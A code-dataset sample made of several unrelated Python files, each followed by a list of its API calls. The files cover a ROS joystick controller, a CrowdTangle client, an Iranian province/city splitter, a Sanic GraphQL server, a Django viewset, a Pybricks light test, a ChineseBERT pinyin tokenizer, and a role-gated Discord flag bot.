start consume...
start consume...
start consume...
start consume...
start consume...
start consume...
^Ccancel task
True
cancel task
True
cancel task
True
cancel task
True
cancel task
True
cancel task
True
cancel task
True
cancel task
True
cancel task
True
cancel task
True
cancel task
True
lishulongdeMBP:event_loop lishulong$
"""
| [
"asyncio.Task.all_tasks",
"asyncio.get_event_loop",
"asyncio.wait",
"asyncio.sleep"
] | [((284, 308), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ([], {}), '()\n', (306, 308), False, 'import asyncio\n'), ((154, 171), 'asyncio.sleep', 'asyncio.sleep', (['(10)'], {}), '(10)\n', (167, 171), False, 'import asyncio\n'), ((350, 369), 'asyncio.wait', 'asyncio.wait', (['tasks'], {}), '(tasks)\n', (362, 369), False, 'import asyncio\n'), ((420, 444), 'asyncio.Task.all_tasks', 'asyncio.Task.all_tasks', ([], {}), '()\n', (442, 444), False, 'import asyncio\n')] |
#!/usr/bin/env python
import rospy
import socket
import math
from std_msgs.msg import String
from std_msgs.msg import Time
from std_msgs.msg import UInt8
from std_msgs.msg import UInt32
from sensor_msgs.msg import Joy
from consai_msgs.msg import robot_commands
import topic_tools.srv
# import ssl_refbox.msg
class Buttons():
    """Tracks current and previous joystick button states to detect press/release edges."""

    def __init__(self):
        # Both states start as 0; real button sequences arrive via refresh().
        self.old_input = int()
        self.now_input = int()

    def refresh(self, buttons):
        """Shift the current state into the old one and store *buttons* as current."""
        self.old_input, self.now_input = self.now_input, buttons

    def isPushed(self, num):
        """True while button *num* is currently held down."""
        return self.now_input[num] == 1

    def isEdgeOn(self, num):
        """True only on the update where button *num* went from released to pressed."""
        return self.now_input[num] == 1 and self.old_input[num] == 0

    def isEdgeOff(self, num):
        """True only on the update where button *num* went from pressed to released."""
        return self.now_input[num] == 0 and self.old_input[num] == 1
# class Referee():
#
# """docstring for Referee"""
#
# def __init__(self):
# self.refbox_msg = ssl_refbox.msg.SSLReferee()
# self.pub = rospy.Publisher(
# '~refbox', ssl_refbox.msg.SSLReferee, queue_size=10)
#
# self.halt_button = rospy.get_param('~halt_button')
# self.start_button = rospy.get_param('~start_button')
# self.stopgame_button = rospy.get_param('~stopgame_button')
# self.force_start_button = rospy.get_param('~force_start_button')
#
# def publish(self, command):
# msg = ssl_refbox.msg.SSLReferee()
# msg.stage = 'NORMAL_FIRST_HALF_PRE'
# msg.command = command
#
# self.pub.publish(msg)
class RobotCommand():
    """Translates sensor_msgs/Joy samples into consai robot_commands messages.

    Axis/button indices are read from private ROS parameters at start-up.
    publish() relies on the module-level `buttons` edge detector (created in
    __main__) to toggle between holonomic and non-holonomic control.
    """
    def __init__(self):
        self.pub = rospy.Publisher(
            '~robot_commands', robot_commands, queue_size=10)
        # Joystick mapping is configured via the private parameter server,
        # so different gamepads can be wired up per launch file.
        self.surge_axis = rospy.get_param('~surge_axis')
        self.sway_axis = rospy.get_param('~sway_axis')
        self.turn_l_axis = rospy.get_param('~turn_l_axis')
        self.turn_r_axis = rospy.get_param('~turn_r_axis')
        self.kick_x_button = rospy.get_param('~kick_x_button')
        self.kick_z_button = rospy.get_param('~kick_z_button')
        self.dribble_button = rospy.get_param('~dribble_button')
        self.turbo_button = rospy.get_param('~turbo_button')
        self.select_button = rospy.get_param('~select_button')
        # Start in holonomic (omnidirectional) control mode.
        self.holonomic = True
    def publish(self, joy):
        """Build and publish one robot_commands message from a Joy sample."""
        commands = robot_commands()
        # The select button toggles holonomic <-> non-holonomic control
        # (edge-triggered via the module-level `buttons` tracker).
        if buttons.isEdgeOn(self.select_button) == True:
            self.holonomic = not self.holonomic
            if self.holonomic == True:
                rospy.loginfo('Change controller mode : holonomic')
            else:
                rospy.loginfo('Change controller mode : NON-holonomic')
        # Holding the turbo button triples all commanded speeds.
        if joy.buttons[self.turbo_button] == 0:
            vel_scale = 1
        else:
            vel_scale = 3
        if self.holonomic == True:
            # Holonomic: surge stick drives forward, sway stick steers.
            commands.vel_surge = joy.axes[self.surge_axis] * vel_scale
            commands.vel_sway = 0.0
            commands.omega = joy.axes[self.sway_axis] * 1.5 * vel_scale
        else:
            # Non-holonomic: both translation axes used; turning comes from
            # the difference of the left/right trigger axes.
            commands.vel_surge = joy.axes[self.surge_axis] * vel_scale
            commands.vel_sway = joy.axes[self.sway_axis] * vel_scale
            omega = -joy.axes[self.turn_l_axis] + joy.axes[self.turn_r_axis]
            commands.omega = omega * 1.5 * vel_scale
        # Kick selection: straight kick (x), chip kick (x+z), or none.
        if joy.buttons[self.kick_x_button] == 1:
            commands.kick_speed_x = 3
            commands.kick_speed_z = 0
        elif joy.buttons[self.kick_z_button] == 1:
            commands.kick_speed_x = 3
            commands.kick_speed_z = 3
        else:
            commands.kick_speed_x = 0
            commands.kick_speed_z = 0
        if joy.buttons[self.dribble_button] == 1:
            commands.dribble_power = 1
        else:
            commands.dribble_power = 0
        self.pub.publish(commands)
def receiveJoy(joy):
    # Joy topic callback: update the edge-detector state first, then
    # translate the sample into a robot command.  Uses the module-level
    # `buttons` and `commands` objects created in __main__.
    buttons.refresh(joy.buttons)
    # referee.publish(joy)
    commands.publish(joy)
if __name__ == '__main__':
    rospy.init_node('joystick_node')
    # Instantiate at module level so the Joy callback can reach them.
    buttons = Buttons()
    # referee = Referee()
    commands = RobotCommand()
    # get parameters
    friend_color = rospy.get_param('friend_color')
    # Subscribe to the joystick topic and hand control to ROS.
    rospy.Subscriber("joy", Joy, receiveJoy)
    rospy.spin()
| [
"rospy.Subscriber",
"rospy.init_node",
"rospy.get_param",
"rospy.spin",
"consai_msgs.msg.robot_commands",
"rospy.Publisher",
"rospy.loginfo"
] | [((4137, 4169), 'rospy.init_node', 'rospy.init_node', (['"""joystick_node"""'], {}), "('joystick_node')\n", (4152, 4169), False, 'import rospy\n'), ((4318, 4349), 'rospy.get_param', 'rospy.get_param', (['"""friend_color"""'], {}), "('friend_color')\n", (4333, 4349), False, 'import rospy\n'), ((4379, 4419), 'rospy.Subscriber', 'rospy.Subscriber', (['"""joy"""', 'Joy', 'receiveJoy'], {}), "('joy', Joy, receiveJoy)\n", (4395, 4419), False, 'import rospy\n'), ((4424, 4436), 'rospy.spin', 'rospy.spin', ([], {}), '()\n', (4434, 4436), False, 'import rospy\n'), ((1821, 1886), 'rospy.Publisher', 'rospy.Publisher', (['"""~robot_commands"""', 'robot_commands'], {'queue_size': '(10)'}), "('~robot_commands', robot_commands, queue_size=10)\n", (1836, 1886), False, 'import rospy\n'), ((1927, 1957), 'rospy.get_param', 'rospy.get_param', (['"""~surge_axis"""'], {}), "('~surge_axis')\n", (1942, 1957), False, 'import rospy\n'), ((1983, 2012), 'rospy.get_param', 'rospy.get_param', (['"""~sway_axis"""'], {}), "('~sway_axis')\n", (1998, 2012), False, 'import rospy\n'), ((2043, 2074), 'rospy.get_param', 'rospy.get_param', (['"""~turn_l_axis"""'], {}), "('~turn_l_axis')\n", (2058, 2074), False, 'import rospy\n'), ((2105, 2136), 'rospy.get_param', 'rospy.get_param', (['"""~turn_r_axis"""'], {}), "('~turn_r_axis')\n", (2120, 2136), False, 'import rospy\n'), ((2166, 2199), 'rospy.get_param', 'rospy.get_param', (['"""~kick_x_button"""'], {}), "('~kick_x_button')\n", (2181, 2199), False, 'import rospy\n'), ((2229, 2262), 'rospy.get_param', 'rospy.get_param', (['"""~kick_z_button"""'], {}), "('~kick_z_button')\n", (2244, 2262), False, 'import rospy\n'), ((2293, 2327), 'rospy.get_param', 'rospy.get_param', (['"""~dribble_button"""'], {}), "('~dribble_button')\n", (2308, 2327), False, 'import rospy\n'), ((2356, 2388), 'rospy.get_param', 'rospy.get_param', (['"""~turbo_button"""'], {}), "('~turbo_button')\n", (2371, 2388), False, 'import rospy\n'), ((2418, 2451), 'rospy.get_param', 
'rospy.get_param', (['"""~select_button"""'], {}), "('~select_button')\n", (2433, 2451), False, 'import rospy\n'), ((2531, 2547), 'consai_msgs.msg.robot_commands', 'robot_commands', ([], {}), '()\n', (2545, 2547), False, 'from consai_msgs.msg import robot_commands\n'), ((2710, 2761), 'rospy.loginfo', 'rospy.loginfo', (['"""Change controller mode : holonomic"""'], {}), "('Change controller mode : holonomic')\n", (2723, 2761), False, 'import rospy\n'), ((2796, 2851), 'rospy.loginfo', 'rospy.loginfo', (['"""Change controller mode : NON-holonomic"""'], {}), "('Change controller mode : NON-holonomic')\n", (2809, 2851), False, 'import rospy\n')] |
import random
import requests
import time
class Crowdtangle:
    """Minimal client for the CrowdTangle Chrome-extension link API.

    api_tokens is a pool of API tokens; one is picked at random per request
    to spread quota usage across them.
    """
    def __init__(self, api_tokens=None):
        # Avoid the shared-mutable-default pitfall; omitting the argument
        # still yields an empty pool (same as the old `api_tokens=[]`).
        self.api_tokens = api_tokens if api_tokens is not None else []
        self.apiBaseUrl = "https://api.crowdtangle.com/ce/"
        self.chromeAppVersion = "3.0.3"
        self.userAgent = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    def _requestAPI(self, requestUrl, params, link):
        """Issue one GET for *link* against *requestUrl*; returns the Response."""
        headers = ({'User-Agent': self.userAgent,\
                    'Accept': 'application/json, text/javascript, */*; q=0.01',\
                    'Sec-Fetch-Mode': 'cors'})
        params['link'] = link
        result = requests.get(requestUrl, params = params, headers=headers)
        return result
    def _getReferalSection(self, url):
        """Fetch the referral section for *url*, retrying once on HTTP 500.

        Returns the decoded JSON body of the last response.
        """
        requestUrl = self.apiBaseUrl + "links"
        referalParams = {
            "token": random.choice(self.api_tokens),"version": self.chromeAppVersion}
        result = self._requestAPI(requestUrl, referalParams, url)
        if(result.status_code == 500):
            print("ERROR 500:")
            print(result.headers)
            result = self._requestAPI(requestUrl, referalParams, url)
            if(result.status_code == 500):
                print("ERROR 500:")
                print(result.headers)
        return result.json()
    def get_url_referals(self, url, wait=15):
        """Return the posts referring to *url*, sorted oldest-first.

        Sleeps *wait* seconds before the request (crude rate limiting).
        Returns an empty list when the API reports an error or no result.
        """
        time.sleep(wait)
        data = self._getReferalSection(url)
        # BUG FIX: the result list was only bound inside the success branch,
        # so the error path crashed with NameError at `return l`.
        posts = []
        if "error" not in data and 'result' in data:
            data['result']['posts']['posts'].sort(key = lambda x:x['post_date']) #sort datetime
            for post in data['result']['posts']['posts']:
                post["link_id"]=url
                posts.append(post)
        else:
            print("No referal data :(, link : " +str(url))
        return posts
| [
"random.choice",
"time.sleep",
"requests.get"
] | [((628, 684), 'requests.get', 'requests.get', (['requestUrl'], {'params': 'params', 'headers': 'headers'}), '(requestUrl, params=params, headers=headers)\n', (640, 684), False, 'import requests\n'), ((1350, 1366), 'time.sleep', 'time.sleep', (['wait'], {}), '(wait)\n', (1360, 1366), False, 'import time\n'), ((842, 872), 'random.choice', 'random.choice', (['self.api_tokens'], {}), '(self.api_tokens)\n', (855, 872), False, 'import random\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import json
# see: https://en.wikipedia.org/wiki/ISO_3166-2:IR
PROVINCE_MAP = {
    u'آذربایجان شرقی': 1,
    u'آذربایجان غربی': 2,
    u'اردبیل': 3,
    u'اصفهان': 4,
    u'ایلام': 5,
    u'بوشهر': 6,
    u'تهران': 7,
    u'چهار محال و بختیاری': 8,
    u'خوزستان': 10,
    u'زنجان': 11,
    u'سمنان': 12,
    u'سیستان و بلوچستان': 13,
    u'فارس': 14,
    u'کرمان': 15,
    u'کردستان': 16,
    u'کرمانشاه': 17,
    u'کهگیلویه و بویراحمد': 18,
    u'گیلان': 19,
    u'لرستان': 20,
    u'مازندران': 21,
    u'مرکزی': 22,
    u'هرمزگان': 23,
    u'همدان': 24,
    u'یزد': 25,
    u'قم': 26,
    u'گلستان': 27,
    u'قزوین': 28,
    u'خراسان جنوبی': 29,
    u'خراسان رضوی': 30,
    u'خراسان شمالی': 31,
    u'البرز': 32,
}


def get_province_id(name):
    """Return the ISO 3166-2:IR id for a province name, or 0 if unknown."""
    return PROVINCE_MAP.get(name, 0)
# Load the full city list, group city names by province id, and write one
# JSON file per province under ./dist/.
with open('./iran/dist/iran.json') as opened:
    iran = json.load(opened)

data = {}
for city in iran:
    pid = get_province_id(city['province_name']);
    # pid == 0 means the province name was not recognised; skip it.
    if pid > 0:
        if not pid in data.keys():
            data[pid] = []
        data[pid].append(city['city_name'])

for pid in data.keys():
    # ensure_ascii=False keeps the Persian names readable in the output.
    with open('./dist/' + str(pid) + '.json', 'w', encoding='utf8') as out:
        json.dump(data[pid], out, ensure_ascii=False)
| [
"json.load",
"json.dump"
] | [((987, 1004), 'json.load', 'json.load', (['opened'], {}), '(opened)\n', (996, 1004), False, 'import json\n'), ((1316, 1361), 'json.dump', 'json.dump', (['data[pid]', 'out'], {'ensure_ascii': '(False)'}), '(data[pid], out, ensure_ascii=False)\n', (1325, 1361), False, 'import json\n')] |
from sanic import Sanic
from sanic.response import json, text
from sanic_graphql import GraphQLView
from api import schema, setup
app = Sanic()

@app.route("/")
async def root(request):
    # Plain-text landing page; queries must be POSTed (see post_root).
    return text("Welcome! Call me via POST with graphql query in body.")

@app.route("/", methods=['POST'])
async def post_root(request):
    # Execute the GraphQL query found in the JSON request body.
    # NOTE(review): result.errors is ignored — failed queries return null data.
    result = schema.execute(request.json['query'])
    return json(result.data)

# GraphiQL-enabled endpoint for interactive exploration of the schema.
app.add_route(GraphQLView.as_view(schema=schema, graphiql=True), '/graphql')

if __name__ == "__main__":
    setup()
    app.run(host="0.0.0.0", port=4000)
| [
"api.setup",
"api.schema.execute",
"sanic.response.json",
"sanic.Sanic",
"sanic_graphql.GraphQLView.as_view",
"sanic.response.text"
] | [((138, 145), 'sanic.Sanic', 'Sanic', ([], {}), '()\n', (143, 145), False, 'from sanic import Sanic\n'), ((199, 260), 'sanic.response.text', 'text', (['"""Welcome! Call me via POST with graphql query in body."""'], {}), "('Welcome! Call me via POST with graphql query in body.')\n", (203, 260), False, 'from sanic.response import json, text\n'), ((340, 377), 'api.schema.execute', 'schema.execute', (["request.json['query']"], {}), "(request.json['query'])\n", (354, 377), False, 'from api import schema, setup\n'), ((389, 406), 'sanic.response.json', 'json', (['result.data'], {}), '(result.data)\n', (393, 406), False, 'from sanic.response import json, text\n'), ((423, 472), 'sanic_graphql.GraphQLView.as_view', 'GraphQLView.as_view', ([], {'schema': 'schema', 'graphiql': '(True)'}), '(schema=schema, graphiql=True)\n', (442, 472), False, 'from sanic_graphql import GraphQLView\n'), ((518, 525), 'api.setup', 'setup', ([], {}), '()\n', (523, 525), False, 'from api import schema, setup\n')] |
from rest_framework import viewsets, permissions, serializers
from rest_framework.response import Response
from iaso.models import MatchingAlgorithm
from .common import HasPermission
class AlgorithmsSerializer(serializers.ModelSerializer):
    """Serializes MatchingAlgorithm rows for the /api/algorithms/ endpoint."""

    class Meta:
        model = MatchingAlgorithm
        fields = ["id", "name", "description", "created_at"]
        # created_at is set by the model, never by API clients.
        read_only_fields = ["created_at"]
class AlgorithmsViewSet(viewsets.ModelViewSet):
    """Algorithms API

    This API is restricted to authenticated users having the "menupermissions.iaso_links" permission

    GET /api/algorithms/
    """

    # NOTE(review): only IsAuthenticated is enforced here; the docstring's
    # "iaso_links" permission claim is not implemented (HasPermission is
    # imported but unused in this file) — confirm the intended access control.
    permission_classes = [permissions.IsAuthenticated]
    serializer_class = AlgorithmsSerializer
    # "patch" is deliberately absent from the allowed HTTP methods.
    http_method_names = ["get", "post", "put", "head", "options", "trace", "delete"]

    def get_queryset(self):
        # Stable ordering so paginated clients get deterministic pages.
        algos = MatchingAlgorithm.objects.all()
        return algos.order_by("id")
| [
"iaso.models.MatchingAlgorithm.objects.all"
] | [((835, 866), 'iaso.models.MatchingAlgorithm.objects.all', 'MatchingAlgorithm.objects.all', ([], {}), '()\n', (864, 866), False, 'from iaso.models import MatchingAlgorithm\n')] |
# SPDX-License-Identifier: MIT
# Copyright (c) 2020 The Pybricks Authors
"""
Hardware Module: 1
Description: This tests the lights on the Ultrasonic Sensor. No external
sensors are used to verify that it works.
"""
from pybricks.pupdevices import UltrasonicSensor
from pybricks.parameters import Port
from pybricks.tools import wait
from urandom import randint
# Initialize devices.
lights = UltrasonicSensor(Port.C).lights

# Turn on all lights at full brightness.
lights.on()
wait(500)

# Sweep brightness across the range; values below 0 and above 100 are fed
# in too (presumably to exercise clamping in the lights API — no external
# sensor verifies this, per the module header).
for i in range(-50, 150, 2):
    lights.on(i)
    wait(20)

# Turn of all lights.
lights.off()
wait(500)

# Drive each of the 4 lights with an independent random brightness, 50 times.
for i in range(50):
    lights.on([randint(0, 100) for j in range(4)])
    wait(50)
| [
"pybricks.tools.wait",
"pybricks.pupdevices.UltrasonicSensor",
"urandom.randint"
] | [((482, 491), 'pybricks.tools.wait', 'wait', (['(500)'], {}), '(500)\n', (486, 491), False, 'from pybricks.tools import wait\n'), ((610, 619), 'pybricks.tools.wait', 'wait', (['(500)'], {}), '(500)\n', (614, 619), False, 'from pybricks.tools import wait\n'), ((396, 420), 'pybricks.pupdevices.UltrasonicSensor', 'UltrasonicSensor', (['Port.C'], {}), '(Port.C)\n', (412, 420), False, 'from pybricks.pupdevices import UltrasonicSensor\n'), ((565, 573), 'pybricks.tools.wait', 'wait', (['(20)'], {}), '(20)\n', (569, 573), False, 'from pybricks.tools import wait\n'), ((718, 726), 'pybricks.tools.wait', 'wait', (['(50)'], {}), '(50)\n', (722, 726), False, 'from pybricks.tools import wait\n'), ((678, 693), 'urandom.randint', 'randint', (['(0)', '(100)'], {}), '(0, 100)\n', (685, 693), False, 'from urandom import randint\n')] |
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
@File : tokenzier.py
@Time : 2021/09/11 16:00:04
@Author : <NAME>
@Version : 1.0
@Contact : <EMAIL>
@Desc : None
'''
import json
import os
from typing import List
import numpy as np
from pypinyin import Style, pinyin
from .. import BasicTokenizer, PretrainedTokenizer, WordpieceTokenizer
__all__ = ['ChineseBertTokenizer']
class ChineseBertTokenizer(PretrainedTokenizer):
    """Tokenizer for ChineseBERT-style models.

    On top of the usual WordPiece token ids it produces "pinyin ids": for
    every token position an 8-slot vector of pinyin-character ids, looked up
    from JSON vocabularies under ``<bert_path>/config``.  Positions that are
    not exactly one Chinese character (multi-character tokens, non-Chinese
    text, special tokens) receive an all-zero vector.
    """

    resource_files_names = {"vocab_file": "vocab.txt"}  # for save_pretrained
    pretrained_resource_files_map = {}
    pretrained_init_configuration = {}
    padding_side = 'right'

    def __init__(self,
                 bert_path,
                 max_seq_len=512,
                 do_lower_case=True,
                 unk_token="[UNK]",
                 sep_token="[SEP]",
                 pad_token="[PAD]",
                 cls_token="[CLS]",
                 mask_token="[MASK]"):
        """Load the WordPiece vocabulary and the pinyin lookup tables from
        *bert_path*.  Raises ValueError when vocab.txt is missing."""
        vocab_file = os.path.join(bert_path, 'vocab.txt')
        config_path = os.path.join(bert_path, 'config')
        if not os.path.isfile(vocab_file):
            raise ValueError(
                "Can't find a vocabulary file at path '{}'. To load the "
                "vocabulary from a pretrained model please use "
                "`tokenizer = BertTokenizer.from_pretrained(PRETRAINED_MODEL_NAME)`"
                .format(vocab_file))
        self.vocab = self.load_vocabulary(vocab_file, unk_token=unk_token)
        self.max_seq_len = max_seq_len

        # pinyin character <-> id mapping (provides the "char2idx" table)
        with open(os.path.join(config_path, 'pinyin_map.json'),
                  encoding='utf8') as fin:
            self.pinyin_dict = json.load(fin)
        # char id -> pinyin ids table (loaded but not referenced in this class)
        with open(os.path.join(config_path, 'id2pinyin.json'),
                  encoding='utf8') as fin:
            self.id2pinyin = json.load(fin)
        # full pinyin string (e.g. "zhong1") -> precomputed 8-slot id vector
        with open(os.path.join(config_path, 'pinyin2tensor.json'),
                  encoding='utf8') as fin:
            self.pinyin2tensor = json.load(fin)

        self.basic_tokenizer = BasicTokenizer(do_lower_case=do_lower_case)
        self.wordpiece_tokenizer = WordpieceTokenizer(vocab=self.vocab,
                                                      unk_token=unk_token)

    def tokenize_sentence(self, sentence):
        """Encode *sentence* into aligned numpy arrays: ``input_ids`` (1-D)
        and ``pinyin_ids`` (one 8-wide row per token)."""
        # convert sentence to ids
        tokenizer_output = self.encode(sentence)
        input_ids = tokenizer_output['input_ids']
        pinyin_ids = self.convert_sentence_to_pinyin_ids(sentence)
        # assert,token nums should be same as pinyin token nums
        # assert len(input_ids) <= self.max_seq_len
        # assert len(input_ids) == len(pinyin_ids)
        # convert list to tensor
        # input_ids = paddle.to_tensor(input_ids)
        # pinyin_ids = paddle.to_tensor(pinyin_ids).reshape([-1])
        # convert list to np.array
        input_ids = np.array(input_ids)
        pinyin_ids = np.array(pinyin_ids).reshape([-1, 8])
        return {"input_ids": input_ids, "pinyin_ids": pinyin_ids}

    def convert_sentence_to_pinyin_ids(self, sentence: str, with_specail_token=True) -> List[List[int]]:
        """Return one 8-slot pinyin-id vector per token of *sentence*,
        optionally including all-zero rows for the [CLS]/[SEP] slots."""
        # get offsets
        bert_tokens_offsets = self.get_offset_mapping(sentence)
        if with_specail_token:
            bert_tokens_offsets.insert(0, (0, 0))
            bert_tokens_offsets.append((0, 0))
        # get tokens
        bert_tokens_tokens = self.tokenize(sentence)
        if with_specail_token:
            bert_tokens_tokens.insert(0, '[CLS]')
            bert_tokens_tokens.append('[SEP]')
        # get pinyin of a sentence; non-Chinese chars map to 'not chinese'
        pinyin_list = pinyin(sentence,
                             style=Style.TONE3,
                             heteronym=True,
                             errors=lambda x: [['not chinese'] for _ in x])

        pinyin_locs = {}
        # get pinyin of each location
        for index, item in enumerate(pinyin_list):
            pinyin_string = item[0]
            # not a Chinese character, pass
            if pinyin_string == "not chinese":
                continue
            if pinyin_string in self.pinyin2tensor:
                pinyin_locs[index] = self.pinyin2tensor[pinyin_string]
            else:
                # Fall back to per-character encoding of the pinyin string;
                # any unknown pinyin character zeroes the whole vector.
                ids = [0] * 8
                for i, p in enumerate(pinyin_string):
                    if p not in self.pinyin_dict["char2idx"]:
                        ids = [0] * 8
                        break
                    ids[i] = self.pinyin_dict["char2idx"][p]
                pinyin_locs[index] = ids

        # find chinese character location, and generate pinyin ids
        pinyin_ids = []
        for idx, (token, offset) in enumerate(
                zip(bert_tokens_tokens, bert_tokens_offsets)):
            if offset[1] - offset[0] != 1:
                # token spans more than one char, or is a [CLS]/[SEP] special token
                pinyin_ids.append([0] * 8)
                continue
            if offset[0] in pinyin_locs:
                # single-character token with a pinyin vector
                pinyin_ids.append(pinyin_locs[offset[0]])
            else:
                # single-character token without a pinyin vector
                pinyin_ids.append([0] * 8)

        return pinyin_ids

    def convert_tokens_to_pinyin_ids(self,
                                     tokens: List[str]) -> List[List[int]]:
        """
        Like convert_sentence_to_pinyin_ids, but starting from a token list.

        Example :
            tokens: ['[CLS]', '你', '多', '大', '了', '?', '[SEP]', '我', '10', '岁', '了', '。', '[SEP]']
        """
        pinyin_ids = []
        for token in tokens:
            if token == '[CLS]' or token == '[SEP]':
                # [CLS] / [SEP] special tokens get all-zero vectors
                pinyin_ids.append([0] * 8)
                continue
            offset = self.get_offset_mapping(token)[0]
            if offset[1] - offset[0] != 1:
                # token made of more than one character
                pinyin_ids.append([0] * 8)
                continue
            pinyin_string = pinyin(token,
                                   style=Style.TONE3,
                                   heteronym=True,
                                   errors=lambda x: [['not chinese']
                                                     for _ in x])[0][0]
            if pinyin_string == "not chinese":
                # not a Chinese character
                pinyin_ids.append([0] * 8)
            else:
                if pinyin_string in self.pinyin2tensor:
                    pinyin_ids.append(self.pinyin2tensor[pinyin_string])
                else:
                    # Per-character fallback; unknown chars zero the vector.
                    ids = [0] * 8
                    for i, p in enumerate(pinyin_string):
                        if p not in self.pinyin_dict["char2idx"]:
                            ids = [0] * 8
                            break
                        ids[i] = self.pinyin_dict["char2idx"][p]
                    pinyin_ids.append(ids)
        return pinyin_ids

    @property
    def vocab_size(self):
        """
        Return the size of vocabulary.

        Returns:
            int: The size of vocabulary.
        """
        return len(self.vocab)

    def _tokenize(self, text):
        # Basic (per-word) tokenization followed by WordPiece sub-word splits.
        split_tokens = []
        for token in self.basic_tokenizer.tokenize(text):
            for sub_token in self.wordpiece_tokenizer.tokenize(token):
                split_tokens.append(sub_token)
        return split_tokens

    def tokenize(self, text):
        """Tokenize *text* into WordPiece tokens."""
        return self._tokenize(text)

    def convert_tokens_to_string(self, tokens):
        """Join WordPiece tokens back into text, undoing the "##" prefixes."""
        out_string = " ".join(tokens).replace(" ##", "").strip()
        return out_string

    def num_special_tokens_to_add(self, pair=False):
        """Number of special tokens added for one sequence (or a pair)."""
        token_ids_0 = []
        token_ids_1 = []
        return len(
            self.build_inputs_with_special_tokens(
                token_ids_0, token_ids_1 if pair else None))

    def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None):
        """[CLS] A [SEP] for a single sequence; [CLS] A [SEP] B [SEP] for a pair."""
        if token_ids_1 is None:
            return [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
        _cls = [self.cls_token_id]
        _sep = [self.sep_token_id]
        return _cls + token_ids_0 + _sep + token_ids_1 + _sep

    def build_offset_mapping_with_special_tokens(self,
                                                 offset_mapping_0,
                                                 offset_mapping_1=None):
        """Offset mapping with (0, 0) entries in the special-token slots."""
        if offset_mapping_1 is None:
            return [(0, 0)] + offset_mapping_0 + [(0, 0)]

        return [(0, 0)] + offset_mapping_0 + [(0, 0)
                                              ] + offset_mapping_1 + [(0, 0)]

    def create_token_type_ids_from_sequences(self,
                                             token_ids_0,
                                             token_ids_1=None):
        """Segment ids: 0 for sequence A (incl. its specials), 1 for B."""
        _sep = [self.sep_token_id]
        _cls = [self.cls_token_id]
        if token_ids_1 is None:
            return len(_cls + token_ids_0 + _sep) * [0]
        return len(_cls + token_ids_0 + _sep) * [0] + len(token_ids_1 +
                                                          _sep) * [1]

    def get_special_tokens_mask(self,
                                token_ids_0,
                                token_ids_1=None,
                                already_has_special_tokens=False):
        """Return 1 for special-token positions and 0 for sequence tokens."""
        if already_has_special_tokens:
            if token_ids_1 is not None:
                raise ValueError(
                    "You should not supply a second sequence if the provided sequence of "
                    "ids is already formatted with special tokens for the model."
                )
            return list(
                map(
                    lambda x: 1
                    if x in [self.sep_token_id, self.cls_token_id] else 0,
                    token_ids_0))

        if token_ids_1 is not None:
            return [1] + ([0] * len(token_ids_0)) + [1] + (
                [0] * len(token_ids_1)) + [1]
        return [1] + ([0] * len(token_ids_0)) + [1]
| [
"pypinyin.pinyin",
"os.path.join",
"os.path.isfile",
"numpy.array",
"json.load"
] | [((961, 997), 'os.path.join', 'os.path.join', (['bert_path', '"""vocab.txt"""'], {}), "(bert_path, 'vocab.txt')\n", (973, 997), False, 'import os\n'), ((1020, 1053), 'os.path.join', 'os.path.join', (['bert_path', '"""config"""'], {}), "(bert_path, 'config')\n", (1032, 1053), False, 'import os\n'), ((2900, 2919), 'numpy.array', 'np.array', (['input_ids'], {}), '(input_ids)\n', (2908, 2919), True, 'import numpy as np\n'), ((3626, 3729), 'pypinyin.pinyin', 'pinyin', (['sentence'], {'style': 'Style.TONE3', 'heteronym': '(True)', 'errors': "(lambda x: [['not chinese'] for _ in x])"}), "(sentence, style=Style.TONE3, heteronym=True, errors=lambda x: [[\n 'not chinese'] for _ in x])\n", (3632, 3729), False, 'from pypinyin import Style, pinyin\n'), ((1069, 1095), 'os.path.isfile', 'os.path.isfile', (['vocab_file'], {}), '(vocab_file)\n', (1083, 1095), False, 'import os\n'), ((1671, 1685), 'json.load', 'json.load', (['fin'], {}), '(fin)\n', (1680, 1685), False, 'import json\n'), ((1855, 1869), 'json.load', 'json.load', (['fin'], {}), '(fin)\n', (1864, 1869), False, 'import json\n'), ((2046, 2060), 'json.load', 'json.load', (['fin'], {}), '(fin)\n', (2055, 2060), False, 'import json\n'), ((1551, 1595), 'os.path.join', 'os.path.join', (['config_path', '"""pinyin_map.json"""'], {}), "(config_path, 'pinyin_map.json')\n", (1563, 1595), False, 'import os\n'), ((1738, 1781), 'os.path.join', 'os.path.join', (['config_path', '"""id2pinyin.json"""'], {}), "(config_path, 'id2pinyin.json')\n", (1750, 1781), False, 'import os\n'), ((1921, 1968), 'os.path.join', 'os.path.join', (['config_path', '"""pinyin2tensor.json"""'], {}), "(config_path, 'pinyin2tensor.json')\n", (1933, 1968), False, 'import os\n'), ((2941, 2961), 'numpy.array', 'np.array', (['pinyin_ids'], {}), '(pinyin_ids)\n', (2949, 2961), True, 'import numpy as np\n'), ((5864, 5964), 'pypinyin.pinyin', 'pinyin', (['token'], {'style': 'Style.TONE3', 'heteronym': '(True)', 'errors': "(lambda x: [['not chinese'] for _ in 
x])"}), "(token, style=Style.TONE3, heteronym=True, errors=lambda x: [[\n 'not chinese'] for _ in x])\n", (5870, 5964), False, 'from pypinyin import Style, pinyin\n')] |
# bot.py
import os
import discord
from discord.ext import commands
from dotenv import load_dotenv
from time import sleep
load_dotenv()
TOKEN = os.getenv('DISCORD_TOKEN')

# The flag is read from disk when deployed; fall back to an env var locally.
try:
    with open('/app/flag.txt', 'r') as r:
        FLAG = r.read().strip()
except FileNotFoundError:
    FLAG = os.getenv('FLAG', 'bts{tmpflag}')

prefix = "!!"
accepted_role = "Mr.Stark"

bot = commands.Bot(command_prefix=prefix, case_insensitive=True)
# The default help command is replaced by the custom `!!help` embed below.
bot.remove_command("help")
@bot.event
async def on_ready():
    # Fired once the gateway connection is established.
    print('### Working as {0.user}'.format(bot))
@commands.guild_only()
@bot.command()
async def secret(ctx):
    # Reveal the flag, but only to members holding the `Mr.Stark` role.
    role = discord.utils.get(ctx.guild.roles, name=accepted_role)
    if role in ctx.author.roles:
        await ctx.send(f"Here is secret for you, sir: `{FLAG}`")
    else:
        await ctx.send(f":no_entry_sign: I am sorry {ctx.author.mention}, but you have no power of `{accepted_role}` here")
